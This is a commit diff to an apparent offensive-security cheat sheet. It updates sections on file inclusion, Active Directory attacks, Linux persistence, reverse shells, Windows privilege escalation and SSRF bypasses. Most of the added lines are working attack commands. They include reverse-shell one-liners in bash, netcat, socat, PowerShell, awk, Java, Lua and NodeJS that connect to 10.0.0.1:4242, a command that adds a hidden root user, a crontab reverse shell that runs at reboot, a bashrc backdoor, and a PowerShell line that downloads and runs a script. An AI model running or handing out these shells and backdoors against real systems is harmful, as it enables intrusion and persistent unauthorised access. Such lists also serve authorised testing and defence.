Add root user + PHP null byte version

2019-06-24 00:21:39 +02:00 · 2019-06-24 00:21:39 +02:00 · 9be62677b6
parent c3f96c6753
commit 9be62677b6
7 changed files with 72 additions and 21 deletions
--- a/Inclusion/README.md
+++ b/Inclusion/README.md
@ -33,6 +33,7 @@

 * [Kadimus - https://github.com/P0cL4bs/Kadimus](https://github.com/P0cL4bs/Kadimus)
 * [LFISuite - https://github.com/D35m0nd142/LFISuite](https://github.com/D35m0nd142/LFISuite)
+* [fimap - https://github.com/kurobeats/fimap](https://github.com/kurobeats/fimap)

 ## Basic LFI

@ -44,6 +45,8 @@ http://example.com/index.php?page=../../../etc/passwd

 ### Null byte

+:warning: In versions of PHP below 5.3 we can terminate with null byte.
+
 ```powershell
 http://example.com/index.php?page=../../../etc/passwd%00
 ```
--- a/Injection/README.md
+++ b/Injection/README.md
@ -211,4 +211,6 @@ curl -X POST http://localhost:8080/graphql\?embedded_submission_form_uuid\=1%27%
 * [GraphQL NoSQL Injection Through JSON Types - June 12, 2017 - Pete Corey](http://www.petecorey.com/blog/2017/06/12/graphql-nosql-injection-through-json-types/)
 * [SQL injection in GraphQL endpoint through embedded_submission_form_uuid parameter - Nov 6th 2018 - @jobert](https://hackerone.com/reports/435066)
 * [Looting GraphQL Endpoints for Fun and Profit - @theRaz0r](https://raz0r.name/articles/looting-graphql-endpoints-for-fun-and-profit/)
-* [How to set up a GraphQL Server using Node.js, Express & MongoDB - 5 NOVEMBER 2018 - Leonardo Maldonado](https://www.freecodecamp.org/news/how-to-set-up-a-graphql-server-using-node-js-express-mongodb-52421b73f474/)
+* [How to set up a GraphQL Server using Node.js, Express & MongoDB - 5 NOVEMBER 2018 - Leonardo Maldonado](https://www.freecodecamp.org/news/how-to-set-up-a-graphql-server-using-node-js-express-mongodb-52421b73f474/)
+* [GraphQL cheatsheet - DEVHINTS.IO](https://devhints.io/graphql)
+* [HIP19 Writeup - Meet Your Doctor 1,2,3 - June 22, 2019 - Swissky](https://swisskyrepo.github.io/HIP19-MeetYourDoctor/)
--- a/Resources/Active
+++ b/Resources/Active
@ -318,6 +318,11 @@ UserPassword, UnixUserPassword, unicodePwd and msSFU30Password.

 Get-WmiObject -Class Win32_UserAccount -Filter "Domain='COMPANYDOMAIN' AND Disabled='False'" | Select Name, Domain, Status, LocalAccount, AccountType, Lockout, PasswordRequired,PasswordChangeable, Description, SID
 ```
+or dump the Active Directory and `grep` the content.
+
+```powershell
+ldapdomaindump -u 'DOMAIN\john' -p MyP@ssW0rd 10.10.10.10 -o ~/Documents/AD_DUMP/
+```

 ### PassTheTicket Golden Tickets

@ -581,6 +586,8 @@ Alternatively you can use the Metasploit module

 Password spraying refers to the attack method that takes a large number of usernames and loops them with a single password. 

+> The builtin Administrator account (RID:500) cannot be locked out of the system no matter how many failed logon attempts it accumulates. 
+
 Using `kerbrute`, a tool to perform Kerberos pre-auth bruteforcing.

 ```powershell
@ -645,4 +652,5 @@ Most of the time the best passwords to spray are :
 * [Abusing Exchange: One API call away from Domain Admin - Dirk-jan Mollema](https://dirkjanm.io/abusing-exchange-one-api-call-away-from-domain-admin)
 * [Red Teaming Made Easy with Exchange Privilege Escalation and PowerPriv - Thursday, January 31, 2019 - Dave](http://blog.redxorblue.com/2019/01/red-teaming-made-easy-with-exchange.html)
 * [Chump2Trump - AD Privesc talk at WAHCKon 2017 - @l0ss](https://github.com/l0ss/Chump2Trump/blob/master/ChumpToTrump.pdf)
-* [Post-OSCP Series Part 2 - Kerberoasting - 16 APRIL 2019 - Jon Hickman](https://0metasecurity.com/post-oscp-part-2/)
+* [Post-OSCP Series Part 2 - Kerberoasting - 16 APRIL 2019 - Jon Hickman](https://0metasecurity.com/post-oscp-part-2/)
+* [WHAT’S SPECIAL ABOUT THE BUILTIN ADMINISTRATOR ACCOUNT? - 21/05/2012 - MORGAN SIMONSEN](https://morgansimonsen.com/2012/05/21/whats-special-about-the-builtin-administrator-account-12/)
--- a/Resources/Linux
+++ b/Resources/Linux
@ -1,5 +1,21 @@
 # Linux - Persistence

+## Summary
+
+* [Basic reverse shell](#basic-reverse-shell)
+* [Add a root user](#add-a-root-user)
+* [Suid Binary](#suid-binary)
+* [Crontab - Reverse shell](#crontab-reverse-shell)
+* [Backdooring a user's bash_rc](#backdooring-an-users-bash-rc)
+* [Backdooring a startup service](#backdoor-a-startup-service)
+* [Backdooring a user startup file](#backdooring-an-user-startup-file)
+* [Backdooring a driver](#backdooring-a-driver)
+* [Backdooring the APT](#backdooring-the-apt)
+* [Backdooring the SSH](#backdooring-the-ssh)
+* [Tips](#tips)
+* [References](#references)
+
+
 ## Basic reverse shell

 ```bash
@ -8,6 +24,13 @@ ncat --sctp -lvp 4242
 ncat --tcp -lvp 4242
 ```

+## Add a root user
+
+```powershell
+sudo useradd -ou 0 -g 0 john
+sudo passwd john
+```
+
 ## Suid Binary

 ```powershell
@ -19,13 +42,15 @@ chown root:root $TMPDIR2/croissant
 chmod 4777 $TMPDIR2/croissant
 ```

-## Crontab (Reverse shell to 192.168.1.2 on port 4242)
+## Crontab - Reverse shell

 ```bash
 (crontab -l ; echo "@reboot sleep 200 && ncat 192.168.1.2 4242 -e /bin/bash")|crontab 2> /dev/null
 ```

-## Backdooring an user's bash_rc (FR/EN Version)
+## Backdooring a user's bash_rc 
+
+(FR/EN Version)

 ```bash
 TMPNAME2=".systemd-private-b21245afee3b3274d4b2e2-systemd-timesyncd.service-IgCBE0"
@ -48,7 +73,7 @@ RSHELL="ncat $LMTHD $LHOST $LPORT -e \"/bin/bash -c id;/bin/bash\" 2>/dev/null"
 sed -i -e "4i \$RSHELL" /etc/network/if-up.d/upstart
 ```

-## Backdooring an user startup file
+## Backdooring a user startup file

 Linux, write a file in  `~/.config/autostart/NAME_OF_FILE.desktop`

--- a/Resources/Reverse
+++ b/Resources/Reverse
@ -5,6 +5,7 @@
 * [Reverse Shell](#reverse-shell)
    * [Bash TCP](#bash-tcp)
    * [Bash UDP](#bash-udp)
+    * [Socat](#socat)
    * [Perl](#perl)
    * [Python](#python)
    * [PHP](#php)
@ -50,6 +51,15 @@ Listener:
 nc -u -lvp 4242
 ```

+### Socat
+
+```powershell
+user@attack$ socat file:`tty`,raw,echo=0 TCP-L:4242
+user@victim$ /tmp/socat exec:'bash -li',pty,stderr,setsid,sigint,sane tcp:10.0.0.1:4242
+```
+
+Static socat binary can be found at [https://github.com/andrew-d/static-binaries](https://github.com/andrew-d/static-binaries/raw/master/binaries/linux/x86_64/socat)
+
 ### Perl

 ```perl
@ -118,12 +128,13 @@ echo 'package main;import"os/exec";import"net";func main(){c,_:=net.Dial("tcp","

 ```bash
 nc -e /bin/sh [IPADDR] [PORT]
+nc.traditional -e /bin/bash 10.0.0.1 4444
 ```

 ### Netcat OpenBsd

 ```bash
-rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.0.0.1 1234 >/tmp/f
+rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.0.0.1 4444 >/tmp/f
 ```

 ### Ncat
@ -147,11 +158,11 @@ user@company$ mkfifo /tmp/s; /bin/sh -i < /tmp/s 2>&1 | openssl s_client -quiet
 ### Powershell

 ```powershell
-powershell -NoP -NonI -W Hidden -Exec Bypass -Command New-Object System.Net.Sockets.TCPClient("[IPADDR]",[PORT]);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2  = $sendback + "PS " + (pwd).Path + "> ";$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()
+powershell -NoP -NonI -W Hidden -Exec Bypass -Command New-Object System.Net.Sockets.TCPClient("10.0.0.1",4242);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2  = $sendback + "PS " + (pwd).Path + "> ";$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()
 ```

 ```powershell
-powershell -nop -c "$client = New-Object System.Net.Sockets.TCPClient('10.1.3.40',443);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + 'PS ' + (pwd).Path + '> ';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()"
+powershell -nop -c "$client = New-Object System.Net.Sockets.TCPClient('10.0.0.1',4242);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + 'PS ' + (pwd).Path + '> ';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()"
 ```

 ```powershell
@ -161,21 +172,21 @@ powershell IEX (New-Object Net.WebClient).DownloadString('https://gist.githubuse
 ### Awk

 ```powershell
-awk 'BEGIN {s = "/inet/tcp/0/<IP>/<PORT>"; while(42) { do{ printf "shell>" |& s; s |& getline c; if(c){ while ((c |& getline) > 0) print $0 |& s; close(c); } } while(c != "exit") close(s); }}' /dev/null
+awk 'BEGIN {s = "/inet/tcp/0/10.0.0.1>/4242"; while(42) { do{ printf "shell>" |& s; s |& getline c; if(c){ while ((c |& getline) > 0) print $0 |& s; close(c); } } while(c != "exit") close(s); }}' /dev/null
 ```

 ### Java

 ```java
 r = Runtime.getRuntime()
-p = r.exec(["/bin/bash","-c","exec 5<>/dev/tcp/10.0.0.1/2002;cat <&5 | while read line; do \$line 2>&5 >&5; done"] as String[])
+p = r.exec(["/bin/bash","-c","exec 5<>/dev/tcp/10.0.0.1/4242;cat <&5 | while read line; do \$line 2>&5 >&5; done"] as String[])
 p.waitFor()
 ```

 ### War

 ```java
-msfvenom -p java/jsp_shell_reverse_tcp LHOST=(IP Address) LPORT=(Your Port) -f war > reverse.war
+msfvenom -p java/jsp_shell_reverse_tcp LHOST=10.0.0.1 LPORT=4242 -f war > reverse.war
 strings reverse.war | grep jsp # in order to get the name of the file
 ```

@ -185,13 +196,13 @@ strings reverse.war | grep jsp # in order to get the name of the file
 Linux only

 ```powershell
-lua -e "require('socket');require('os');t=socket.tcp();t:connect('10.0.0.1','1234');os.execute('/bin/sh -i <&3 >&3 2>&3');"
+lua -e "require('socket');require('os');t=socket.tcp();t:connect('10.0.0.1','4242');os.execute('/bin/sh -i <&3 >&3 2>&3');"
 ```

 Windows and Linux

 ```powershell
-lua5.1 -e 'local host, port = "127.0.0.1", 4444 local socket = require("socket") local tcp = socket.tcp() local io = require("io") tcp:connect(host, port); while true do local cmd, status, partial = tcp:receive() local f = io.popen(cmd, 'r') local s = f:read("*a") f:close() tcp:send(s) if status == "closed" then break end end tcp:close()'
+lua5.1 -e 'local host, port = "10.0.0.1", 4444 local socket = require("socket") local tcp = socket.tcp() local io = require("io") tcp:connect(host, port); while true do local cmd, status, partial = tcp:receive() local f = io.popen(cmd, 'r') local s = f:read("*a") f:close() tcp:send(s) if status == "closed" then break end end tcp:close()'
 ```

 ### NodeJS
@ -202,7 +213,7 @@ lua5.1 -e 'local host, port = "127.0.0.1", 4444 local socket = require("socket")
        cp = require("child_process"),
        sh = cp.spawn("/bin/sh", []);
    var client = new net.Socket();
-    client.connect(8080, "10.17.26.64", function(){
+    client.connect(4242, "10.0.0.1", function(){
        client.pipe(sh.stdin);
        sh.stdout.pipe(client);
        sh.stderr.pipe(client);
@ -213,12 +224,12 @@ lua5.1 -e 'local host, port = "127.0.0.1", 4444 local socket = require("socket")

 or

-require('child_process').exec('nc -e /bin/sh [IPADDR] [PORT]')
+require('child_process').exec('nc -e /bin/sh 10.0.0.1 4242')

 or

 -var x = global.process.mainModule.require
-x('child_process').exec('nc [IPADDR] [PORT] -e /bin/bash')
+-x('child_process').exec('nc 10.0.0.1 4242 -e /bin/bash')

 or

--- a/Resources/Windows
+++ b/Resources/Windows
@ -23,6 +23,10 @@

 ## Tools

+- [PowerSploit's PowerUp](https://github.com/PowerShellMafia/PowerSploit)
+    ```powershell
+    powershell -Version 2 -nop -exec bypass IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/PowerShellEmpire/PowerTools/master/PowerUp/PowerUp.ps1'); Invoke-AllChecks
+    ```
 - [Watson - Watson is a (.NET 2.0 compliant) C# implementation of Sherlock](https://github.com/rasta-mouse/Watson)
 - [(Deprecated) Sherlock - PowerShell script to quickly find missing software patches for local privilege escalation vulnerabilities](https://github.com/rasta-mouse/Sherlock)
    ```powershell
@ -43,10 +47,6 @@
    ```powershell
    powershell.exe -ExecutionPolicy Bypass -File .\jaws-enum.ps1 -OutputFilename JAWS-Enum.txt
    ```
- [PowerSploit's PowerUp](https://github.com/PowerShellMafia/PowerSploit)
-    ```powershell
-    powershell -Version 2 -nop -exec bypass IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/PowerShellEmpire/PowerTools/master/PowerUp/PowerUp.ps1'); Invoke-AllChecks
-    ```

 ## Windows Version and Configuration

--- a/Forgery/README.md
+++ b/Forgery/README.md
@ -114,6 +114,7 @@ http://0000::1:3128/ Squid
 ### Bypass localhost with a domain redirection

 ```powershell
+http://spoofed.burpcollaborator.net
 http://localtest.me
 http://customer1.app.localhost.my.company.127.0.0.1.nip.io
 http://mail.ebc.apple.com redirect to 127.0.0.6 == localhost
@ -628,4 +629,5 @@ More info: https://rancher.com/docs/rancher/v1.6/en/rancher-services/metadata-se
 - [SSRF - Server Side Request Forgery (Types and ways to exploit it) Part-1 - SaN ThosH - 10 Jan 2019](https://medium.com/@madrobot/ssrf-server-side-request-forgery-types-and-ways-to-exploit-it-part-1-29d034c27978)
 - [SSRF Protocol Smuggling in Plaintext Credential Handlers : LDAP - @0xrst](https://www.silentrobots.com/blog/2019/02/06/ssrf-protocol-smuggling-in-plaintext-credential-handlers-ldap/)
 - [X-CTF Finals 2016 - John Slick (Web 25) - YEO QUAN YANG @quanyang](https://quanyang.github.io/x-ctf-finals-2016-john-slick-web-25/)
- [Exploiting SSRF in AWS Elastic Beanstalk - February 1, 2019 - @notsosecure](https://www.notsosecure.com/exploiting-ssrf-in-aws-elastic-beanstalk/)
+- [Exploiting SSRF in AWS Elastic Beanstalk - February 1, 2019 - @notsosecure](https://www.notsosecure.com/exploiting-ssrf-in-aws-elastic-beanstalk/)
+- [PortSwigger - Web Security Academy Server-side request forgery (SSRF)](https://portswigger.net/web-security/ssrf)